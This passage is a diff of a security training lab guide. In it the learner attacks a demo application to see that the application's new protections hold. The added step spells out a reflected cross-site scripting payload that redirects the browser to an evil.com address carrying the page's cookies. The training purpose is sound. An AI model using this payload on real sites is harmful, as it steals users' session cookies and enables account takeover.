ericzji/nginx-openshift-lab/docs/class1/module4/lab2.rst

    :align: center

-- Execute the second attack from Module 1 and observe the results
+- Execute the second attack y appending ?item='><script>document.location='http://evil.com/steal'+document.cookie</script> to the application URL, and observe the results

 .. image:: ./pictures/image19.png
    :align: center

+Feel free to execute any attacks you would like and observe the results.

+Congratulations on securing your application!

 **Here are some optional attacks you can try**